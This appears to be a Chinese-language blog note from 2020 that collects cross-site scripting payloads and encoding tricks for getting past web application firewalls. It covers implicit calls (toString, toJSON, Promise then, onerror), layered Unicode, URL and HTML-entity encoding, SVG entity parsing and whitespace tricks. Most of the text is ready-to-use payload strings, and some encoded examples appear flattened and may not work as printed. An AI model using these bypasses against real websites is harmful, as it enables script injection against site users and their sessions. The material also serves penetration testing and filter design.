XSS那些tricks
- 2020 年 3 月 31 日
- 筆記
title: XSS那些tricks
0x00 XSS的WAF防护
最近碰到的两种方式
- 字符串匹配,匹配恶意关键字,比较常见。一般手段为正则匹配,绕过可以通过编码,或者注释符,或者浏览器渲染特性进行绕过。
- 解析js语法。通过截取指定标签内容,对js进行静态语法树解析,对解析出来的语法树进行遍历,在语法树的各个节点进行hook,在节点进行判断。如函数调用的call expression,若call的字符串为alert,则封禁。
0x01 javascript的隐性调用
在调用某些对象,或者执行某些方法时,会自动隐式的调用某些函数。这里有个缺憾,自动调用的函数是不带参数的,并没有找到可以利用的方法(在空白页面),不同环境下有其他利用方法?
一、toString和valueOf
obj进行值运算时,如==,+,-等,会自动调用toString,或者valueOf方法。
payload:
toString=alert;this-1valueOf=alert;this-1
二、JSON对象的toJSON
如果JSON的stringify方法传入的对象有toJSON方法,那么该方法执行的对象会转为toJSON执行后返回的对象。
payload: toJSON=alert;JSON.stringify(this);
三、promise对象的 then
当Promise.resolve方法传入对象时,如果存在 then 方法会立即执行then方法,相当于把方法放入new Promise中,除了Promise.resolve有这个行为外,Promise.all也有这个行为。
payload:
then=alert;Promise.resolve(this).then()then=alert;Promise.all([this]).then()
四、thow和onerror
payload: <script>onerror=alert;throw 1</script>
0x02 编码
先知道哪些标签会进行解码,还有组合在一起时的解码顺序,才会知道在绕过时如何进行编码。
- unicode 编码,形如u003c。js标签会自动解码。
<script>alert(1)</script>=><script>u0061u006cu0065u0072u0074(1)</script>(括号及括号内的不可进行unicode16进制编码)<a href="javascript:u0061u006cu0065u0072u0074('xss')">test</a>
- url解码
<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(3)">a</a>先unicode编码再urlencode编码。<a href="javascript:%5Cu0061%5Cu006c%5Cu0065%5Cu0072%5Cu0074%283%29">a</a>
- html实体编码
<a href="javascript:alert('xss')">test</a><a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(3)">a</a>进行编码=><a href="javascript:%5Cu0061%5Cu006c%5Cu0065%5Cu0072%5Cu0074%283%29">a</a>
- 混合编码 1. 原代码 < <a href="javascript:alert('xss')">test</a> 2. 对alert进行JS编码(unicode编码) <a href="javascript:u0061u006cu0065u0072u0074('xss')">test</a> 3. 对href标签中的u0061u006cu0065u0072u0074进行URL编码 <a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34('xss')">test</a> 4. 对href标签中的javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34('xss')进行HTML编码: <a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34('xss')">test</a>
1. 对javascript:alert(1)进行HTML编码 <img src=xxx onerror="javascript:alert(1)"> 2. 对alert进行JS编码 <img src=xxx onerror="javascript:u0061u006cu0065u0072u0074(1)"> 3. 以上两种方法混用 <img src=xxx onerror="javascript:\u0061\u006c\u0065\u0072\u0074(1)">
- svg的xml属性
payload: <svg><script>alert('xss')</script>
svg标签后接的scrpt标签,会自动进行一次实体解析。
其实可以混合编码利用:先unicode16进制编码,再实体编码。
1. alert(1) 2. u0061u006cu0065u0072u0074(1) 3. \u0061\u006c\u0065\u0072\u0074(1) 4. <svg><script>\u0061\u006c\u0065\u0072\u0074(1)</script>
0x03 空白字符
payload从浏览器地址栏到页面上有一次url解码,可以理解为经过了一次unscape函数。
alert=function(i){ console.log(i.toString(16)) }; for(i=0;i<257;i++){ try{eval('alert'+String.fromCharCode(i)+'('+i+')')}catch(e){}} 结果:09 0a 0b 0c 0d 20
payload:<script>%0b%0balert%0b%a%0c(1)</script>
利用条件为从地址栏到页面输出。可以用来绕过waf。
0x04 一些奇奇怪怪的payload
Lol:Function`alert(1)`
!class extends`${alert(1)}`{}
